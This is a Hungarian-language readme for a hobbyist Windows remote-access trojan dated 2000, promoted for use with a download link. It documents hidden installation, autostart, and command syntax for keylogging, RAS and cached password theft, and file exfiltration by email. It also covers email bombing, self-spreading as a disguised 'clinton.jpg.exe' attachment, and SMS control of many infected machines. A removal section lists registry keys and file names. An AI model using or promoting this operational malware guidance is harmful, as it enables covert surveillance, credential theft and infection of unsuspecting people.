
"Kiskoromból emlékszem,
hogy már a farkas tetszett a mesében..." |
Bevezető:
Ebben a leírásban a mE$$iAh-nak keresztelt trójai programomat fogom bemutatni. Ha nem
tetszik, nem kell elolvasni.
Létezik ennek a doksiknak egy angol változata is, de tekintve hogy a nyelvet milyen
magas szinten beszélem, nagyon jól sikerült :)
Hadd emeljek ki pár ízelítőt a program számtalan lehetősége közül:)
- a távoli számítógépet akár a mobiltelefonodról is vezérelheted!
Hogy hogyan?!
Nagyon egyszerű, csak küldd el a telefonodról sms-ként egy email címre az
utasításokat, és a szerver végre fogja őket hajtani. (persze azért ne essünk
túlzásokba, arra a címre kell küldeni amit előtte beállítottál :))
- akár több gépet is vezérelhetsz egyszerre a mobilodról!!
- küldhetsz emailbombát... és még az IP-d miatt se fog felhívni
az internetszolgáltatód, hogy rosszat játszottál :)
Ugye nem hangzik rosszul? :)
Egy kis előzmény:
Eddig csak egy béta verzió volt elérhető, kizárólag ismerősök számára, teszt
céljából. Sajnos elég kevés visszajelzést kaptam. Szóval bármi ötleted
észrevételed van, nyugodtan megírhatod.
Mi az új a mE$$iAh v1.0 -ban? 2000.08.18.
[*] Új readme file, kijavíttam az angol hibákat, továbbá ez a magyar verziója is
idekerült :)
[*] volt egy bug, vagyisinkább figyelmetlenség, miszerint kétszer be lehetett indítani
a szervert. Na ezt kijavítottam.
[+] Van egy adag új parancs: MD, RD, DIR, STARTKL, STOPKL, STARTFTP, STOPFTP, STARTBOMB,
STOPBOMB, MSGSHOW, WALLP, CACHEPWZ, SLEEP, SOUND, LISTPROCESS, KILLPROCESS, DONTDELETE,
INFECT
[-] A PWZ parancs már nem elő, helyette lehet használni a RASPWZ-t.
[+] Elkészült a makeserver is, amit stílusosan tHe_G0D-nak neveztem el, lehet vele
saját szervert csinálni :)
[*] A klienst is újraírtam (:-) és persze új neve is van: mADaNgEl. Köszönet a
logóért Nestan-nak! (meg különben is érdemel egy nagy thankset a grafikai
segítségeiért)
[*] Az MSG parancs is megváltozott, ezentúl MSGDRAW néven érhető el.
[*] Kicsit optimalizáltam a kódon.
[+] A szerver három véletlenszerű fájlnevet használ arra, hogy hova másolja magát a
WINDOWS\SYSTEM könyvtáron belül.
[+] Formater is sokat segített, részletes bug-leírással, stb. Sőt, készíti a
linuxos klienset!... Nagy nagy köszönet!
Fájlok:
madangel.exe - ez a kliens... - mérete: 307.200
messiah.exe - ez a szerver... - mérete: 196.608
readme.txt - ez az, amit éppen olvasol - mérete: XXXXXX
thegod.exe - ez a makeserver... - mérete: 142.336
A szerver lehetőségei:
[a példák ilyen zárójelekben vannak]
Installálás:
- a szerver rejtőzködve installálja magát
- és automatikusan indul minden windowsindításnál...
Megjegyzés: Az installáláshoz elég beindítanod a szerver exe-jét, és utána akár
le is törölheted, hiszen a szerver úgyis belemásolja magát a system könyvtárba!
Beállítások:
- a szervert levédheted jelszóval, az alapértelmezett: SPY
[+PASWújjelszó]
- a szerver alapértelmezett portja 2000, és ezzel
a paranccsal megváltoztathatod:
[+PORTújportszám]
- leállíthatod a szervert
[+CLOSE]
- és el is távolíthatod a gépről, ezután nem fog beindulni többet
[+REMOVE]
- beállíthatod a POP3 hostot, amin keresztül emailben
elérheted a szervert:
[+POPHSTpéldahost]
- Ehhez meg kell adnod a felhasználónevet
[+POPUSRpéldafelhasználó]
- És az ehhez tartozó jelszót:
[+POPPWDpéldajelszó]
- beállíthatod az SMTP-t, hostját:
[+SMTPHSTpéldahost]
- Meg kell adnod, hogy mi legyen az emailcím eleje ha a
szerver levelet küld, a cím vége pedig az smtp hostja lesz
[+SMTPUSRpéldauser]
- És beállíthatod azt az emailcímet, ahova a szerver fogja
küldeni a leveleket: (pl. email értesítés ha a szerver online)
[+SMTPS2példaemailcím]
- beállíthatod a POP ellenőrzés gyakoriságát (az alapértelmezett
60000századmásodperc)
[+TIMERpéldaszázadmásodperc]
Megjegyzés: Mindhárom POP beállítást meg kell adnod hogy emailben/mobilról
vezérelni tudjad a szervert, illetve hogy emailben tudj feltölteni fájlt. Ha az SMTP
beállításokat is kitöltöd, akkor már kaphatsz email értesítést, amikor a szerver
számítógép a netre kapcsolódik. A szerver az online állapotot időszakosan
ellenőrzi, a gyakoriság beállításához a TIMER parancsot használhatod, lásd
feljebb. Addig nem tudod mobilról irányítani a gépet, amíg nem állítod be megfelelően
a POP3-as dolgokat.
Fájl kezelés:
- elindíthatsz fájlt a szerveren:
[+EXECbeindítandófájl paraméter]
- törölhetsz a szerverről fájlt:
[+DELtörlendőfájl]
- másolhatsz fájlt a szerveren
[+COPYforrásfájl célkönyvtár]
- áthelyezhetsz fájlt a szerveren, (ez akár átnevezés is lehet)
[+MOVEforrásfájl újneve]
- elküldetheted emailben a fájlt, amit meg akarsz szerezni a szerverről
[+GFILEmelyikfájlttöltsükle]
- könyvtárat hozhatsz létre a szerveren
[+MDkönyvtárnév]
- le is törölhetsz könyvtárat (akárcsak a deltree, tehát rekurzívan!!)
[+RDkönyvtárnév]
- kilistázhatod a fájlokat a szerveren (az alapértelmezett *.*) pl:
[+DIRc:\*.*]
- a szerverrel továbbküldheted magát egy megadott emailcímre
clinton.jpg.exe néven, és a tárgy valami nagyon vicces lesz :)
[+INFECTutálunk@billi.com]
Megjegyzés: Így akár emailen keresztül is lebonyolíthatod a fájlforgalmat.
Feltöltéshez a POP beállításoknak rendben kell lenniük, és arra az emailcímre amit
megadtál, simán csatold el a fájlt. Persze ez elég körülményes, használd inkább a
szerver FTP szerverét :)
Vegyes:
- cd tálca kinyitása
[+CDOPEN]
- cd tálca bezárása
[+CDCLS]
- monitor kikapcsolása
[+MONOFF]
- monitor bekapcsolása
[+MONON]
- aktuális ablak/program bezárása
[+CAW]
- üzenetküldés ablakban
[+MSGSHOWEz egy példa üzenet]
- üzenetküldés rajzolva
[+MSGDRAWEz egy példa üzenet]
- háttérkép megváltoztatása, pl:
[+WALLPc:\logo.sys]
- hang lejátszása, pl:
[+SOUNDc:\windows\media\The Microsoft Sound.wav]
Számítógép:
- suspend módba kapcsolás
[+SUSP]
- gép újraindítása
[+REBOOT]
- gép kikapcsolása
[+POWER]
- gép lefagyasztása
[+LOCKUP]
- keyloggolás indítása (az alapértelmezett mentési
hely C:\WINDOWS\SYSTEM\WINA386.DLL)
[+STARTKL]
- szerver leállítása
[+STOPKL]
- FTP server indítása
[+STARTFTP]
- FTP server leállítása
[+STOPFTP]
- emailbomba küldése (paraméter nélküli parancs esetén az előző
címzettnek fogja a bombát küldeni a szervert)
[+STARTBOMBemailcím]
- bombázás leállítása
[+STOPBOMB]
- fél percre leállíthatod a szerver parancsfeldolgozását
Ez pl arra jó, ha több parancsot küldesz egyszerre:
[+CDOPEN+SLEEP+MSGSHOWyou fuck+SLEEP+OPENCD]
Megjegyzés: a gépkikapcsolás NT alatt asszem nem működik. A lefagyasztásnak viszont
működnie kell(ene). Az emailbombázás addig megy, amíg le nem állítod...
Információk:
- RAS jelszavak lekérése
[+RASPWZ]
- cache-ben tárolt jelszavak lekérése
[+CACHEPWZ]
- aktuális felhasználónév
[+CUSER]
- windows könyvtár
[+WDIR]
- aktív processzek lekérdeséze
[+LISTPROCESS]
- futó processz lelövése
[+KILLPROCESSprocessazonosítóbetűje]
Utolsó megjegyzésem:): a mobilon keresztüli vezérléshez az POPUSR@POPHST címre kell
küldened az sms-t. A parancsoknak a tárgyban kell lenniük. Egyszerre több parancsot is
használhatsz, pl: +CDOPEN+MSGSHOWKapd be!+LOCKUP
Ha több gépet is szeretnél egyszerre vezérelni, akkor mindegyiknek ugyanazt a POP
kiszolgálót kell megadni és persze ugyanazt a mailboxot. Ezután a parancsot a
következőképpen küldheted:
[+DONTDELETE+MSGSGOWhello]
Mindegyik gép végre fogja hajtani a parancsot, egészen addig amíg nem küldesz egy
olyan üzenetet amiben nincs benne a +DONTDELETE parancs. Pl:
[+MSGSGOWstop!]
Eltávolítás
Az eltávolítás legegyszerűbb módja +REMOVE parancs küldése a szervernek.
Manuális eltávolításhoz kövesd az alábbi lépéseket:
töröld a JYService regisztri bejegyzést az alábbi címről:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
Utána töröld le a C:\WINDOWS\SYSTEM\J4YSRV.EXE és/vagy
C:\WINDOWS\SYSTEM\WINAPI.EXE és/vagy C:\WINDOWS\SYSTEM\MAPISRV.EXE
fájlokat.
A szerver a beállításokat szintén a regisztriben tárolja:
HKEY_LOCAL_MACHINE\Software\Spy
Természetesen ezt is törölheted.
Köszönet
Formater - ez a program nem jöhetett volna létre a segítséged nélkül!
Nestan - köszi mindent, de akkor sem hiszem el hogy iszol :)))
skYro - kezdő krekk lépéseim :)
Xanthos - sok sok mindent köszönhetek már :)
GutyKa - hogyhogy nem vettem észre a te trojanodat korábban?
Yamin - ötöst kapni számtekból, ehhh :)
$tephen - aki elindított az underground pályán :)
Trevor - első fordításaim :))
Taki - akinek az ötlete volt ez az egész trójan dolog :)
Asdef Gehaj - NT tesztelés :)
Sun-Zero - izé egész jó dolog ez a hákker élet :)))))))))))))))))))
Pepe - support rulez :)
"I hate people that
are lame." /Offspring/ |
Szóval a seggfejek
bekaphatják. Te is MadMind! |
Ennyi!
Asszem elmondtam mindent, amit tudnod kell. Ha van kérdésed írj. De azért ezt a fájlt
olvasd csak át előtte mégegyszer, mert különben leharapom a fejedet. :) Az
emailcímem: rsctm@freemail.hu Megpróbálok
minden levélre válaszolni...
Ha a linux klienssel kapcsolatban vannak kérdéseid, írj Formater-nek: formater@thepentagon.com
Enjoy... -=|R|S|C|=-
- Letöltés -
|